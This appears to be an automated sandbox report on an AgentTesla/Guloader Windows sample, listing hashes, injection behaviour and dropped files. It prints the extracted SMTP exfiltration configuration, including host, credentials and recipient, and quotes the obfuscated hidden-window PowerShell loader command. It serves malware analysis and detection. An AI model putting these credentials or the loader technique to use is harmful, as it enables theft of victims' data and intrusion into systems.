Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05/04/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Borteskamoteringers/Fridtjof.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Borteskamoteringers/Fridtjof.ps1
Resource
win10v2004-20240226-en
General
-
Target
3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe
-
Size
652KB
-
MD5
7971d20d1b569b51e56f37fc734a1c81
-
SHA1
3c1a1fa66cd9890c8e0021853d39ab7b3aefc5c7
-
SHA256
3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b
-
SHA512
6efbec26eebfcaeed965a46ab22f4870fc6fa93d09818c7cf03782f34c8a768b4defa5b9b1f347ef41798df82c725a3f5a402793d977e6d791fe5b857d36c6a4
-
SSDEEP
12288:nXRAvufNFTr7L/R90rJ2RPBY+K9Yc65vpNpqwDwmuu6TNxFu+i:nXRyUNJr7L30N2RJXKz65vprPqu6hxF+
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
cp8nl.hyperhost.ua - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@#$ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 39 drive.google.com 40 drive.google.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\skillfully.ins 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4108 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3452 powershell.exe 4108 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3452 set thread context of 4108 3452 powershell.exe 106 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\ukases.lnk 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\resources\tuskish\smilehuller.lnk 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 4108 wab.exe 4108 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3452 powershell.exe Token: SeDebugPrivilege 4108 wab.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 4896 wrote to memory of 3452 4896 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe 94 PID 4896 wrote to memory of 3452 4896 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe 94 PID 4896 wrote to memory of 3452 4896 3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe 94 PID 3452 wrote to memory of 4412 3452 powershell.exe 104 PID 3452 wrote to memory of 4412 3452 powershell.exe 104 PID 3452 wrote to memory of 4412 3452 powershell.exe 104 PID 3452 wrote to memory of 4108 3452 powershell.exe 106 PID 3452 wrote to memory of 4108 3452 powershell.exe 106 PID 3452 wrote to memory of 4108 3452 powershell.exe 106 PID 3452 wrote to memory of 4108 3452 powershell.exe 106 PID 3452 wrote to memory of 4108 3452 powershell.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe"C:\Users\Admin\AppData\Local\Temp\3137663df90055b5c2dd92ff91ed1a0edc6965dbd50f83578643c727b36b060b.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Begavede=Get-Content 'C:\Users\Admin\AppData\Local\Ubarberet\Borteskamoteringers\Fridtjof.Bea';$Alpelandet=$Begavede.SubString(59880,3);.$Alpelandet($Begavede)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:4412
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1040 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:81⤵PID:1372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
58KB
MD5b747bba9cd5ec658f83a8f004b9ddc9b
SHA1eb25e589a4de7af6afd91ccaf9c12f30aaf3c67a
SHA2564fc178d7b0c912917422d5259e796c28f38a765bc3f56fa14df7480b49a0f2f2
SHA5127e115a0e8cc9b16cd7eeafc6aa6635815763384ab543bb92308c197af849a49e9109f775652151617dc094862313109830091f5d203f582a887595b81b875d9e
-
Filesize
350KB
MD55a078e54f0d5d5d90111e92881a45f0b
SHA196c2419b4e1f9609e11bab95c051780d5a812a3d
SHA256cec934596d590684641da052fa5d39b119c7b668c28925e196213d4258ac75b0
SHA512d6b893adddd088f8c03389a31d10c6b87c0f67f1620739c02821e2f51d4b785abb512fc1e550ba08b653569069d37e62c1f8a54a55845d2b346f9eebb061f569